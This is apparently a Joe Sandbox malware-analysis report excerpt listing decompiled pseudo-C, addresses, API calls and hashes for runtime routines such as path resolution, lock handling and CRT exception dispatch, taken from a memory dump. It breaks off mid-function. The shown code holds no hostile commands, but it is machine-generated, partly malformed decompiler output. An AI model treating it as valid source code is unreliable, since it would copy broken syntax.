Instruction ID: e7e38ab6af5532139425a0796f34e825f0eca09c5edbc73f57bce6e47fa6741e
Opcode Fuzzy Hash: 323313b80642b7f808c09f758925bd8f9e33e6cf077079e566fc4ce8ae372bf3
Instruction Fuzzy Hash: 4911C872B002146BDB149B2DDC45A6B7BADDF89794F05C129F90ECB292D631DD01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000F0522 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000F0522(void* __ecx, WCHAR** _a4) {
				long _t8;
				LPWSTR* _t11;
				WCHAR** _t19;
				void* _t20;

				_t19 = _a4;
				_t20 = __ecx;
				_t2 = _t20 + 8; // 0x531dae8
				_t3 = _t20 + 0xc; // 0x4c48300
				_t8 = GetFullPathNameW( *_t19,  *_t3,  *_t2, 0);
				if(_t8 == 0) {
					L1:
					E000ED2CD(GetLastError());
					return  *((intOrPtr*)(E000ED2A7()));
				}
				_t4 = _t20 + 0xc; // 0x4c48300
				if(_t8 <=  *_t4) {
					L5:
					 *(_t20 + 0x10) = _t8;
					return 0;
				}
				_t11 = L000EEB37(_t20, _t8 + 1);
				if(_t11 == 0) {
					_t5 = _t20 + 8; // 0x531dae8
					_t6 = _t20 + 0xc; // 0x4c48300
					_t8 = GetFullPathNameW( *_t19,  *_t6,  *_t5, _t11);
					if(_t8 == 0) {
						goto L1;
					}
					goto L5;
				}
				return _t11;
			}

0x000f0529
0x000f052c
0x000f0530
0x000f0533
0x000f0538
0x000f0540
0x000f0542
0x000f0549
0x00000000
0x000f0554
0x000f0558
0x000f055b
0x000f057d
0x000f057d
0x00000000
0x000f0580
0x000f0561
0x000f0568
0x000f056b
0x000f056e
0x000f0573
0x000f057b
0x00000000
0x00000000
0x00000000
0x000f057b
0x000f0585

APIs

GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,000F049B,00000000,?,000FE81B,000F049B,?,?,0009F005,000A01ED,0009F005,00000001,00000000), ref: 000F0538
GetLastError.KERNEL32(?,000FE81B,000F049B,?,?,0009F005,000A01ED,0009F005,00000001,00000000,00000000,?,000F049B,0009F005,000A01ED,?), ref: 000F0542
__dosmaperr.LIBCMT ref: 000F0549
GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,04C48301,?,000FE81B,000F049B,?,?,0009F005,000A01ED,0009F005,00000001,00000000,00000000), ref: 000F0573

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 76120ba206122ecb8caac209f61c0bedc80eb420e858dbe2e947447aea7a0c0f
Instruction ID: a19d5bdea95e560ddf006ab8ef3197af6447c58f46342e774b86a6bf763ae2c7
Opcode Fuzzy Hash: 76120ba206122ecb8caac209f61c0bedc80eb420e858dbe2e947447aea7a0c0f
Instruction Fuzzy Hash: 12F0AF36200644AFDB306BA6DC04EABBBE9FF44760710C429F656D3922DB71E850AB50

Uniqueness

Uniqueness Score: -1.00%

Function 000F0588 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000F0588(void* __ecx, WCHAR** _a4) {
				long _t8;
				LPWSTR* _t11;
				WCHAR** _t19;
				void* _t20;

				_t19 = _a4;
				_t20 = __ecx;
				_t2 = _t20 + 8; // 0x531dae8
				_t3 = _t20 + 0xc; // 0x4c48300
				_t8 = GetFullPathNameW( *_t19,  *_t3,  *_t2, 0);
				if(_t8 == 0) {
					L1:
					E000ED2CD(GetLastError());
					return  *((intOrPtr*)(E000ED2A7()));
				}
				_t4 = _t20 + 0xc; // 0x4c48300
				__eflags = _t8 -  *_t4;
				if(__eflags <= 0) {
					L5:
					 *(_t20 + 0x10) = _t8;
					__eflags = 0;
					return 0;
				}
				_t11 = E000EA3A2(_t20, __eflags, _t8 + 1);
				__eflags = _t11;
				if(_t11 == 0) {
					_t5 = _t20 + 8; // 0x531dae8
					_t6 = _t20 + 0xc; // 0x4c48300
					_t8 = GetFullPathNameW( *_t19,  *_t6,  *_t5, _t11);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L1;
					}
					goto L5;
				}
				return _t11;
			}

0x000f058f
0x000f0592
0x000f0596
0x000f0599
0x000f059e
0x000f05a6
0x000f05a8
0x000f05af
0x00000000
0x000f05ba
0x000f05be
0x000f05be
0x000f05c1
0x000f05e3
0x000f05e3
0x000f05e6
0x00000000
0x000f05e6
0x000f05c7
0x000f05cc
0x000f05ce
0x000f05d1
0x000f05d4
0x000f05d9
0x000f05df
0x000f05e1
0x00000000
0x00000000
0x00000000
0x000f05e1
0x000f05eb

APIs

GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,000F049B,00000000,?,000FE7A3,000F049B,000F049B,?,?,0009F005,000A01ED,0009F005,00000001), ref: 000F059E
GetLastError.KERNEL32(?,000FE7A3,000F049B,000F049B,?,?,0009F005,000A01ED,0009F005,00000001,00000000,00000000,?,000F049B,0009F005,000A01ED), ref: 000F05A8
__dosmaperr.LIBCMT ref: 000F05AF
GetFullPathNameW.KERNEL32(?,04C48300,0531DAE8,00000000,04C48301,?,000FE7A3,000F049B,000F049B,?,?,0009F005,000A01ED,0009F005,00000001,00000000), ref: 000F05D9

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 8b86ffae89012f41f074c1abdc0d3d607eec5a2de2bc249eea22aa339773bd49
Instruction ID: d47eb4f8de6fcc8bd3f60b7c09ae52e2e98e8d6256b5499c7d8bd33c1c1eaec6
Opcode Fuzzy Hash: 8b86ffae89012f41f074c1abdc0d3d607eec5a2de2bc249eea22aa339773bd49
Instruction Fuzzy Hash: 1CF0A432200705AFDB305BB2DC04EABBBE9EF447607108419F696D7921DB71EC50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 000A85A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E000A85A0(signed int __ecx, signed int _a4) {
				void* _v16;
				signed int _v24;
				signed int _v32;
				char _v49;
				char _v52;
				char _v53;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				void* _t83;
				signed char _t88;
				intOrPtr _t89;
				signed int* _t92;
				signed int _t95;
				intOrPtr _t101;
				signed int _t107;
				intOrPtr _t114;
				signed int _t116;
				signed int _t123;
				signed int _t124;
				signed int _t128;
				signed int _t130;
				void* _t146;

				_t123 = __ecx;
				_t67 =  *0x120014; // 0xf049169a
				_v24 = _t67 ^ _t130;
				 *((intOrPtr*)(__ecx + 0x48)) =  *((intOrPtr*)(__ecx + 0x48)) + 1;
				asm("adc dword [ecx+0x4c], 0x0");
				_t124 = _a4;
				_t88 =  >=  ? ( *(__ecx + 0x5d + _t124 * 8) & 0x000000ff) >> 0x00000003 & 0x000000ff : 1;
				_v49 = 0xff;
				_t72 =  *((intOrPtr*)(__ecx + 0x2d8)) + 0x40;
				_v68 = _t72;
				__imp__TryAcquireSRWLockExclusive(_t72);
				if(_t72 == 0) {
					L000A8B90(_t72, _v72);
				}
				_v68 = _t88 & 0x000000ff;
				_t74 = 0;
				_t125 = _t124 << 5;
				_v76 = _t124 << 5;
				_v60 = _t123;
				asm("o16 nop [cs:eax+eax]");
				do {
					_v64 = _t74;
					_t89 =  *((intOrPtr*)(_t123 + 0x2d8));
					_t92 =  *(_t89 + _v76 + 0x48);
					_t76 =  *_t92;
					if(_t76 == 0) {
						_t76 = L000B87D0(_t89 + _v76 + 0x48, _t89, 0x21,  *((intOrPtr*)(_t89 + _v76 + 0x54)), 0x4000,  &_v53);
						if(_t76 == 0) {
							goto L17;
						} else {
							_t125 = _t76 >> 0x00000009 & 0x00000fe0;
							_t92 = (_t76 >> 0x00000009 & 0x00000fe0) + (_t76 & 0xffe00000) - (( *((_t76 >> 0x00000009 & 0x00000fe0) + (_t76 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
							goto L10;
						}
					} else {
						_v53 = 0;
						_t123 =  *_t76;
						if(_t123 == 0) {
							_t128 = 0;
							goto L9;
						} else {
							_t128 = _t123;
							asm("bswap esi");
							if((_t128 ^ _t76) > 0x1fffff || (_t128 & 0x001fc000) == 0) {
								_t89 =  *((intOrPtr*)(_t89 + _v76 + 0x54));
								asm("pcmpeqd xmm0, xmm0");
								asm("movdqa [esp+0x20], xmm0");
								_t125 =  &_v52;
								_t83 = L000A88D0(_t125, "first", _t123, 0);
								_push(_t125);
								E00070790(_t83);
								L000A8960(_t89, _t146);
								L17:
								_t107 = _a4;
								_t95 = _v64;
							} else {
								asm("prefetcht0 [esi]");
								L9:
								 *_t92 = _t128;
								_t116 = _t92[3];
								_t125 = _t116 + 0x00000002 & 0x00003ffe;
								_t92[3] = _t116 & 0xffffc001 | _t116 + 0x00000002 & 0x00003ffe;
								_t123 = _v60;
								goto L10;
							}
						}
					}
					L15:
					 *_t123 =  *_t123 + ( *(_t123 + 0x5e + _t107 * 8) & 0x0000ffff) * _t95;
					__imp__ReleaseSRWLockExclusive();
					return E000DE643(( *(_t123 + 0x5e + _t107 * 8) & 0x0000ffff) * _t95, _t89, _v32 ^ _t130, _t107, _t123, _t125, _v72);
					L10:
					_t114 =  *((intOrPtr*)(_t89 + 0x117c)) +  *((intOrPtr*)(_t92[2] + 0xc));
					_t101 =  *((intOrPtr*)(_t89 + 0x1180));
					 *((intOrPtr*)(_t89 + 0x117c)) = _t114;
					_t115 =  >  ? _t101 : _t114;
					 *((intOrPtr*)(_t89 + 0x1180)) =  >  ? _t101 : _t114;
					_t107 = _a4;
					asm("bswap ecx");
					 *_t76 =  *(_t123 + 0x58 + _t107 * 8);
					 *(_t123 + 0x58 + _t107 * 8) = _t76;
					_t74 = _v64 + 1;
					 *((char*)(_t123 + 0x5c + _t107 * 8)) =  *((char*)(_t123 + 0x5c + _t107 * 8)) + 1;
				} while (_v68 != _t74);
				_t95 = _v68;
				goto L15;
			}

0x000a85ac
0x000a85ae
0x000a85b5
0x000a85b9
0x000a85bd
0x000a85c1
0x000a85d6
0x000a85d9
0x000a85e4
0x000a85e7
0x000a85ec
0x000a85f4
0x000a85fa
0x000a85fa
0x000a8602
0x000a8606
0x000a8608
0x000a860b
0x000a860f
0x000a8613
0x000a8620
0x000a8620
0x000a8624
0x000a862e
0x000a8632
0x000a8636
0x000a86f1
0x000a86f8
0x00000000
0x000a86fe
0x000a870b
0x000a8724
0x00000000
0x000a8724
0x000a863c
0x000a863c
0x000a8641
0x000a8645
0x000a8670
0x00000000
0x000a8647
0x000a8647
0x000a8649
0x000a8655
0x000a8760
0x000a8764
0x000a8768
0x000a876e
0x000a877c
0x000a8781
0x000a8782
0x000a878c
0x000a8791
0x000a8791
0x000a8794
0x000a8669
0x000a8669
0x000a8672
0x000a8672
0x000a8674
0x000a867a
0x000a8688
0x000a868b
0x00000000
0x000a868b
0x000a8655
0x000a8645
0x000a8733
0x000a873b
0x000a8741
0x000a8759
0x000a868f
0x000a8698
0x000a869b
0x000a86a1
0x000a86a9
0x000a86ac
0x000a86b2
0x000a86b9
0x000a86bb
0x000a86bd
0x000a86c5
0x000a86c6
0x000a86ca
0x000a872f
0x00000000

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000A85EC
ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,000000FF), ref: 000A8741

Part of subcall function 000A8B90: TryAcquireSRWLockExclusive.KERNEL32(00134B90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000A8BAC
Part of subcall function 000A8B90: AcquireSRWLockExclusive.KERNEL32(00134B90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000A8BDD

Strings

first, xrefs: 000A8777

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: first
API String ID: 1678258262-2456940119
Opcode ID: 82426948429372687e4329f90ef387d5f09db2b95e8e11bfa960b45d57716f3f
Instruction ID: 3e44f76dfdae260d8eb10cc7c07c83a8d18406e5fcb429a6e156c5596db117e8
Opcode Fuzzy Hash: 82426948429372687e4329f90ef387d5f09db2b95e8e11bfa960b45d57716f3f
Instruction Fuzzy Hash: 9351E571A043419FC714DF28C4806AAB7E1FFC9354F24CA6DF9899B296DB34E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000B6120 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E000B6120(signed int __ebx, signed int __ecx, signed int __edi, void* __esi, void* __fp0, intOrPtr _a12) {
				void* _v0;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t35;
				signed int _t36;
				signed int _t64;
				unsigned int _t67;
				signed int _t87;
				signed int _t90;
				signed int _t92;
				void* _t93;

				_t106 = __fp0;
				_t83 = __edi;
				_t56 = __ebx;
				if( *((char*)(__ecx + 0x3f0)) == 0) {
					return _t35;
				} else {
					_pop(_t89);
					_t90 = _t92;
					_push(__ebx);
					_push(__edi);
					_push(__esi);
					_t93 = _t92 - 0x18;
					_t87 = __ecx;
					_t36 =  *0x120014; // 0xf049169a
					_v20 = _t36 ^ _t90;
					_t38 = E000B7530(__ecx + 0x3f4);
					if(_t38 != 0) {
						L23:
						return E000DE643(_t38, _t56, _v24 ^ _t90, _t67, _t83, _t87);
					} else {
						_t83 =  *(__ecx + 0x3fc);
						__imp__TryAcquireSRWLockExclusive(_t83);
						if(_t38 == 0) {
							L000A8CF0(__ebx, _t83, _t67, __eflags, __fp0);
						}
						_v40 = _t83;
						_t38 = L000A7BB0(4,  &_v0);
						_t93 = _t93 + 8;
						_v28 = _t87;
						_t87 =  *(_t87 + 0x404);
						if(_t87 == 0) {
							L22:
							__imp__ReleaseSRWLockExclusive(_v40);
							goto L23;
						} else {
							_t64 = _t38;
							_t67 = (((_t87 - (_t87 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t87 - (_t87 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t87 - (_t87 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t87 - (_t87 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							if(_t67 > 1) {
								__eflags = _t64 - _t87;
								if(_t64 >= _t87) {
									_t83 = _t67;
									_t10 = _t64 % _t87;
									__eflags = _t10;
									_t56 = _t10;
								} else {
									_t56 = _t64;
								}
							} else {
								_t56 = _t87 - 0x00000001 & _t64;
							}
							_t38 =  *( *((intOrPtr*)(_v28 + 0x400)) + _t56 * 4);
							if(_t38 != 0) {
								_t83 =  *_t38;
								if(_t83 != 0) {
									_v36 = _t87 - 1;
									_v44 = _v0;
									_v32 = _t67;
									do {
										_t38 =  *(_t83 + 4);
										if(_t38 == _t64) {
											_t38 = _v44;
											__eflags =  *((intOrPtr*)(_t83 + 8)) - _v44;
											if( *((intOrPtr*)(_t83 + 8)) == _v44) {
												__eflags = _v20 + 4;
												_push(_a12);
												E000B62A0(_v20 + 4, _t83 + 0xc, _t106);
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t90);
												return 0x60000;
											} else {
												goto L15;
											}
										} else {
											if(_t67 > 1) {
												__eflags = _t38 - _t87;
												if(_t38 >= _t87) {
													_t27 = _t38 % _t87;
													__eflags = _t27;
													_t38 = _t27;
													_t67 = _v32;
												}
											} else {
												_t38 = _t38 & _v36;
											}
											if(_t38 == _t56) {
												goto L15;
											} else {
												goto L22;
											}
										}
										goto L26;
										L15:
										_t83 =  *_t83;
										__eflags = _t83;
									} while (_t83 != 0);
								}
							}
							goto L22;
						}
					}
				}
				L26:
			}

0x000b6120
0x000b6120
0x000b6120
0x000b612a
0x000b6133
0x000b612c
0x000b612c
0x000b6141
0x000b6143
0x000b6144
0x000b6145
0x000b6146
0x000b6149
0x000b614b
0x000b6152
0x000b615b
0x000b6162
0x000b625a
0x000b626b
0x000b6168
0x000b6168
0x000b616f
0x000b6177
0x000b6270
0x000b6270
0x000b617d
0x000b6186
0x000b618b
0x000b618e
0x000b6191
0x000b6199
0x000b6251
0x000b6254
0x00000000
0x000b619f
0x000b619f
0x000b61d4
0x000b61da
0x000b61e3
0x000b61e5
0x000b61ed
0x000b61f1
0x000b61f1
0x000b61f3
0x000b61e7
0x000b61e7
0x000b61e7
0x000b61dc
0x000b61df
0x000b61df
0x000b6200
0x000b6205
0x000b6207
0x000b620b
0x000b6210
0x000b6216
0x000b6219
0x000b622e
0x000b622e
0x000b6233
0x000b6220
0x000b6223
0x000b6226
0x000b6280
0x000b6285
0x000b6288
0x000b628d
0x000b628e
0x000b628f
0x000b6290
0x000b6299
0x00000000
0x00000000
0x00000000
0x000b6235
0x000b6238
0x000b6240
0x000b6242
0x000b6246
0x000b6246
0x000b6248
0x000b624a
0x000b624a
0x000b623a
0x000b623a
0x000b623a
0x000b624f
0x00000000
0x00000000
0x00000000
0x00000000
0x000b624f
0x00000000
0x000b6228
0x000b6228
0x000b622a
0x000b622a
0x000b622e
0x000b620b
0x00000000
0x000b6205
0x000b6199
0x000b6162
0x00000000

APIs

Part of subcall function 000B7530: TlsGetValue.KERNEL32(?,?,?,000BD0B3,?,?,00000000,?,000A9DF6,?,?,00000000,?,00000000), ref: 000B753D

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000B616F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000B6254

Strings

MZx, xrefs: 000B6293

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireReleaseValue
String ID: MZx
API String ID: 421378090-2575928145
Opcode ID: 708323385155d22f49f45bc4abd9fb9b8eedf5e2524a06eb5340cc26890b47ad
Instruction ID: bb23a0d544653e52de4cb32d0119eec564c205e4852385e16058ce14171cd0ab
Opcode Fuzzy Hash: 708323385155d22f49f45bc4abd9fb9b8eedf5e2524a06eb5340cc26890b47ad
Instruction Fuzzy Hash: 9C41E672B049094BEB24CF98D8446EEB7E7ABD4710F1CC029E909DB706DB3ADD518791

Uniqueness

Uniqueness Score: -1.00%

Function 000F425D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E000F425D(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr* _t63;

				L000F4B7C(_a12);
				_pop(_t54);
				_t37 = L000F3D51(_t52, _t54, __edx, _t59, _t61);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E000F45C4(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t63 == 0) {
									goto L19;
								}
								 *0x137000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t63();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L000F3F34(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}

0x000f4266
0x000f426b
0x000f426c
0x000f4271
0x000f4276
0x000f4286
0x000f42ae
0x000f42d9
0x000f42f9
0x000f42ff
0x000f433b
0x000f434f
0x00000000
0x000f430c
0x000f430f
0x000f4314
0x00000000
0x00000000
0x000f432e
0x00000000
0x000f4336
0x000f42ff
0x000f42dd
0x000f42e4
0x000f42ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000f42e4
0x000f42b3
0x000f42c9
0x000f42ce
0x00000000
0x000f4357
0x000f4357
0x00000000
0x000f4359

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 000F4266

Strings

csm, xrefs: 000F42F9
csm, xrefs: 000F4288

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 14dd8d57576ea0a5a55a2a60c7410e35b5143a95a9b146cd22c147c58a887929
Instruction ID: 96795d831608071dd4f45a0a62dc39f4583ccf688cbab0efcbc771ff1384b510
Opcode Fuzzy Hash: 14dd8d57576ea0a5a55a2a60c7410e35b5143a95a9b146cd22c147c58a887929
Instruction Fuzzy Hash: DE317E7250021DDBCF669F50C8449BB7BA5FF09325B18416AFE5449522C336D9A2EB81

Uniqueness

Uniqueness Score: -1.00%

Function 000794B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00079513

Strings

3333, xrefs: 00079558
3333, xrefs: 00079551

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID: 3333$3333
API String ID: 4168288129-1524365199
Opcode ID: f626c72587ea3e00de7b39e48168eafb09900b336aef18f97d6e3d7259a7f3ef
Instruction ID: 1f81e8500914f6bcb9078276eaa2aceca3edf57bde586b3fd81a3ec2d01e4aa4
Opcode Fuzzy Hash: f626c72587ea3e00de7b39e48168eafb09900b336aef18f97d6e3d7259a7f3ef
Instruction Fuzzy Hash: 5E215C72F10A144BCB1A9E79884113EF3A7EFD5320709CA2DE54BE7645EA3598C08749

Uniqueness

Uniqueness Score: -1.00%

Function 000AC6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E000AC6C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a8) {
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v40;
				char _v192;
				char _v200;
				intOrPtr _v204;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t21;
				char _t29;
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t44;
				void* _t45;
				intOrPtr _t46;
				char* _t47;
				signed int _t49;

				_t60 = __fp0;
				_t44 = __edx;
				_t45 = __ecx;
				_t18 =  *0x120014; // 0xf049169a
				_v24 = _t18 ^ _t49;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0xa0], xmm0");
				asm("movdqa [esp+0x90], xmm0");
				asm("movdqa [esp+0x80], xmm0");
				asm("movdqa [esp+0x70], xmm0");
				asm("movdqa [esp+0x60], xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_v28 = 0xffffffff;
				_v32 = 0xffffffff;
				_t47 =  &_v192;
				L000C1C10(_t47);
				_t21 = L000C1C60(_t47, 0, 0x200);
